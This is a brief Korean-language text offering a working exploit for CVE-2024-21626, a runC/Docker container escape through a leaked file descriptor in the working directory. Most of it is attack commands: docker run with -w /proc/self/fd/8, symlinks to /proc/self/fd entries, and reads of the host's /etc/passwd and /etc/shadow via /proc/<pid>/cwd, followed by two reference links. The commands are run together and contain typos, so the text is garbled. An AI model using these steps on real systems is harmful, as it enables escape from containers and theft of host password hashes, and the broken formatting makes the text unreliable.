
CVE-2024-21626에 대한 작동하는 익스플로잇으로, 작업 디렉토리 심볼릭 링크 공격을 통한 runC/Docker 컨테이너 탈출을 가능하게 하여 호스트 파일시스템에 접근할 수 있습니다.
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
-w /proc/self/fd/8를 넣는 것입니다.\cat ../../../../../../../../../etc/passwd를 사용하여 호스트 파일시스템에 접근합니다.docker run --name cve-2024-21626 --rm --it debian:bootwormln -sf /proc/self/fd/7/ /fooln -sf /proc/self/fd/8/ /bardocker exec -it -w /bar cve-2024-21626 sleep 120ls -F /proccat /proc/9/cmdline (sleep 명령의 PID 찾기)cat /proc/9/cwd/../../../../../etc/shadowhttps://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626